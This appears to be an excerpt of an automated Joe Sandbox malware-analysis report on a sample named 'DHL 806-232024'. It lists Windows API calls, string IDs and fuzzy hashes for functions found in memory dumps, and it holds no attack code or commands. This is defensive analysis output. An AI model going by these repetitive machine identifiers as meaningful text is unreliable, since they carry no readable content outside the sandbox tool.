                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 641708696-0
                                                                                  • Opcode ID: d0be54da5a1d3b47206ee63a0a16fae6172362372c11e45f68308182d1345207
                                                                                  • Instruction ID: 734fc19d3c193a9710e8f1bd9823ed642188231f67e2c32d04b6ee174b5d206d
                                                                                  • Opcode Fuzzy Hash: d0be54da5a1d3b47206ee63a0a16fae6172362372c11e45f68308182d1345207
                                                                                  • Instruction Fuzzy Hash: 60619D31118715DFCB25AF1ACD58B29B7F1FF60326F10862AE542876A0C771AC80EF51
                                                                                  APIs
                                                                                    • Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC
                                                                                  • GetSysColor.USER32(0000000F), ref: 008D21D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 259745315-0
                                                                                  • Opcode ID: eeea387df8b71074010389edf2b4dcb381aacfc07fd163d1f32f80a97cb27a24
                                                                                  • Instruction ID: c0ea6cff6a20cc939848548d6d8e9a2cb02019877bb5f971e0de3a8e377aa5dd
                                                                                  • Opcode Fuzzy Hash: eeea387df8b71074010389edf2b4dcb381aacfc07fd163d1f32f80a97cb27a24
                                                                                  • Instruction Fuzzy Hash: 064190311086449FDB215F29DC58BB97B66FB16332F144366FD65CA2E2C7318C42EB61
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,0095F910), ref: 0093AB76
                                                                                  • GetDriveTypeW.KERNEL32(00000061,0098A620,00000061), ref: 0093AC40
                                                                                  • _wcscpy.LIBCMT ref: 0093AC6A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 2820617543-1000479233
                                                                                  • Opcode ID: 45280b8ad8d603025d107cc81811377d91e71925df0742f57a4b8dc59b1f593e
                                                                                  • Instruction ID: f3da8230815c4fb4ddfb50f7bfa166cf5d31fbb939ea40ef5b41e0e1955d8c6a
                                                                                  • Opcode Fuzzy Hash: 45280b8ad8d603025d107cc81811377d91e71925df0742f57a4b8dc59b1f593e
                                                                                  • Instruction Fuzzy Hash: 255199301083059FC720EF28C891AAEB7A9FF91304F10492AF4D6972A2EB359D49CB53
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __i64tow__itow__swprintf
                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                  • API String ID: 421087845-2263619337
                                                                                  • Opcode ID: 5125e823ac2fe65c845b874e579abfb2cf8655490747859ad3c1c5321f96b9ed
                                                                                  • Instruction ID: b5cb0fb94b00cd52971abd8eae64cc580988c75daadd93aa8b48d5ce5b0c08cc
                                                                                  • Opcode Fuzzy Hash: 5125e823ac2fe65c845b874e579abfb2cf8655490747859ad3c1c5321f96b9ed
                                                                                  • Instruction Fuzzy Hash: 9D41F271604209BEEB34AB38D852F7A77E8FB44304F20456FE689D7391EE3199418B12
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 009573D9
                                                                                  • CreateMenu.USER32 ref: 009573F4
                                                                                  • SetMenu.USER32(?,00000000), ref: 00957403
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00957490
                                                                                  • IsMenu.USER32(?), ref: 009574A6
                                                                                  • CreatePopupMenu.USER32 ref: 009574B0
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009574DD
                                                                                  • DrawMenuBar.USER32 ref: 009574E5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                  • String ID: 0$F
                                                                                  • API String ID: 176399719-3044882817
                                                                                  • Opcode ID: 4ee17ec899e79d31822ad28f39cbfef396cff8857683bce66e593686b1d4846d
                                                                                  • Instruction ID: 7e1c30c7c52951f28f24f3d440d45074c3dcdd390505862432e48b058cf34ea0
                                                                                  • Opcode Fuzzy Hash: 4ee17ec899e79d31822ad28f39cbfef396cff8857683bce66e593686b1d4846d
                                                                                  • Instruction Fuzzy Hash: 2E416A74A04205EFDB10DFAAE884EAABBFAFF49351F140429FD0597360D730AA14DB50
                                                                                  APIs
                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009577CD
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 009577D4
                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009577E7
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009577EF
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 009577FA
                                                                                  • DeleteDC.GDI32(00000000), ref: 00957803
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0095780D
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00957821
                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0095782D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                  • String ID: static
                                                                                  • API String ID: 2559357485-2160076837
                                                                                  • Opcode ID: 337d4a1737100f9ec8bc6f8c37f32933c4e017e917c49e704a051e569f744462
                                                                                  • Instruction ID: 6c468aa79ffa58a1329e084202f6026935e123e68e016afa7a056191bdfdc5de
                                                                                  • Opcode Fuzzy Hash: 337d4a1737100f9ec8bc6f8c37f32933c4e017e917c49e704a051e569f744462
                                                                                  • Instruction Fuzzy Hash: BA319C32119214ABDF119FA6EC18FDA3B6DEF0D332F100224FA15920A0C7319815EBA4
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 008F707B
                                                                                    • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                                                                  • __gmtime64_s.LIBCMT ref: 008F7114
                                                                                  • __gmtime64_s.LIBCMT ref: 008F714A
                                                                                  • __gmtime64_s.LIBCMT ref: 008F7167
                                                                                  • __allrem.LIBCMT ref: 008F71BD
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F71D9
                                                                                  • __allrem.LIBCMT ref: 008F71F0
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F720E
                                                                                  • __allrem.LIBCMT ref: 008F7225
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F7243
                                                                                  • __invoke_watson.LIBCMT ref: 008F72B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                  • String ID:
                                                                                  • API String ID: 384356119-0
                                                                                  • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                  • Instruction ID: cb98adcfd6d0b827bc88b54009ec6f437519a0cfffd369ceac9761ca5d34408a
                                                                                  • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                  • Instruction Fuzzy Hash: 2D71B671A04B1BABF7149E79CC41B7AB3A8FF54324F14422AFA15D66C1EB70DA508790
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00932A31
                                                                                  • GetMenuItemInfoW.USER32(00996890,000000FF,00000000,00000030), ref: 00932A92
                                                                                  • SetMenuItemInfoW.USER32(00996890,00000004,00000000,00000030), ref: 00932AC8
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00932ADA
                                                                                  • GetMenuItemCount.USER32(?), ref: 00932B1E
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00932B3A
                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00932B64
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00932BA9
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00932BEF
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932C03
                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932C24
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4176008265-0
                                                                                  • Opcode ID: c8f7d0e87f83840a11aebd60eb2eea37f989a9221ae83be348248a3c963405e8
                                                                                  • Instruction ID: c199c4941697658ff36fe33d20d1a1542c982ff397dbf29db4d35d7eeb345305
                                                                                  • Opcode Fuzzy Hash: c8f7d0e87f83840a11aebd60eb2eea37f989a9221ae83be348248a3c963405e8
                                                                                  • Instruction Fuzzy Hash: CC619DB0914249AFDB21CF64D888EBEBBB8EB41314F140599F841E7251E735AD45EF21
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00957214
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00957217
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0095723B
                                                                                  • _memset.LIBCMT ref: 0095724C
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0095725E
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009572D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 830647256-0
                                                                                  • Opcode ID: 7336fedc0a3990dbb96a68bf5cdc1caca51f1fa7a7f5872f95f5870299cb1cf1
                                                                                  • Instruction ID: ac6f11b6b43193d512bd3aad581d41397b2486c0c6d43ec2be7a75d5269169b6
                                                                                  • Opcode Fuzzy Hash: 7336fedc0a3990dbb96a68bf5cdc1caca51f1fa7a7f5872f95f5870299cb1cf1
                                                                                  • Instruction Fuzzy Hash: E9618B71904208AFDB10DFA9DC81EEEB7F8EB09710F14015AFE14A72A1D770AE45DBA0
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00927135
                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 0092718E
                                                                                  • VariantInit.OLEAUT32(?), ref: 009271A0
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 009271C0
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00927213
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00927227
                                                                                  • VariantClear.OLEAUT32(?), ref: 0092723C
                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00927249
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00927252
                                                                                  • VariantClear.OLEAUT32(?), ref: 00927264
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0092726F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  • Opcode ID: 49ce0514f20d76f30559703d9322ba5d2197bb3d960cbe1e959c271365c09b03
                                                                                  • Instruction ID: de1e5fe39e6ff30410b9f3df429615becca7f91fa55ed1015bbdc1e413c51073
                                                                                  • Opcode Fuzzy Hash: 49ce0514f20d76f30559703d9322ba5d2197bb3d960cbe1e959c271365c09b03
                                                                                  • Instruction Fuzzy Hash: 65414135904229EFCF00EFA9D858DAEBBB9FF48355F008069F955E7261CB30A945DB90
                                                                                  APIs
                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00945AA6
                                                                                  • inet_addr.WSOCK32(?,?,?), ref: 00945AEB
                                                                                  • gethostbyname.WSOCK32(?), ref: 00945AF7
                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00945B05
                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00945B75
                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00945B8B
                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00945C00
                                                                                  • WSACleanup.WSOCK32 ref: 00945C06
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                  • String ID: Ping
                                                                                  • API String ID: 1028309954-2246546115
                                                                                  • Opcode ID: 0079a1c9fc787e49b5abfe5928bca08974832850431ade3c135c44b539086d46
                                                                                  • Instruction ID: e50c7be3d1dc556383e2263819fabdb752c261b92cbb99a419a13a533a6b2a4e
                                                                                  • Opcode Fuzzy Hash: 0079a1c9fc787e49b5abfe5928bca08974832850431ade3c135c44b539086d46
                                                                                  • Instruction Fuzzy Hash: 1E5191316187009FD711AF65CC55F2ABBE4EF48720F15892AF556DB2A2DB74EC00DB42
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0093B73B
                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0093B7B1
                                                                                  • GetLastError.KERNEL32 ref: 0093B7BB
                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0093B828
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                  • API String ID: 4194297153-14809454
                                                                                  • Opcode ID: dbd3d59a70ccb4d87171923f78643d462cda26225de34be39ccc7577312b07b5
                                                                                  • Instruction ID: d2e8416881b0c4b3c043b22a4d290ca6ecf1c507f54509b98e43e7595cec6d0b
                                                                                  • Opcode Fuzzy Hash: dbd3d59a70ccb4d87171923f78643d462cda26225de34be39ccc7577312b07b5
                                                                                  • Instruction Fuzzy Hash: 02319335A00209AFDB10EF68C885ABE7BB8FF84754F14412AF602D7391DB759942CF91
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009294F6
                                                                                  • GetDlgCtrlID.USER32 ref: 00929501
                                                                                  • GetParent.USER32 ref: 0092951D
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00929520
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00929529
                                                                                  • GetParent.USER32(?), ref: 00929545
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00929548
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1536045017-1403004172
                                                                                  • Opcode ID: 5845f50df6613dd662ee221d49fa8e799e0ef0fbb7bc020be6960917b409539f
                                                                                  • Instruction ID: 769943ab54caec7f6ff8059178a641af7aeb5f3aabee278c0e6d40ad7762a3b0
                                                                                  • Opcode Fuzzy Hash: 5845f50df6613dd662ee221d49fa8e799e0ef0fbb7bc020be6960917b409539f
                                                                                  • Instruction Fuzzy Hash: 70210670A00218BBCF01AB65DC95EFEBBB8FF45310F100116B962972E6DB755919DB20
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009295DF
                                                                                  • GetDlgCtrlID.USER32 ref: 009295EA
                                                                                  • GetParent.USER32 ref: 00929606
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00929609
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00929612
                                                                                  • GetParent.USER32(?), ref: 0092962E
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00929631
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1536045017-1403004172
                                                                                  • Opcode ID: 76743fb12b14714d8494e31a151680f3df6ddefbd8b3770442c3b979c23fe272
                                                                                  • Instruction ID: d1b709a7c2ac5996ab6bda0355e8b85ed949f506ec1d9463741d04511315c3d6
                                                                                  • Opcode Fuzzy Hash: 76743fb12b14714d8494e31a151680f3df6ddefbd8b3770442c3b979c23fe272
                                                                                  • Instruction Fuzzy Hash: 3C21D474A00218BBDF01AB65DCD5EFEBBB8FF48310F140116F921972A5DB759919DB20
                                                                                  APIs
                                                                                  • GetParent.USER32 ref: 00929651
                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00929666
                                                                                  • _wcscmp.LIBCMT ref: 00929678
                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009296F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
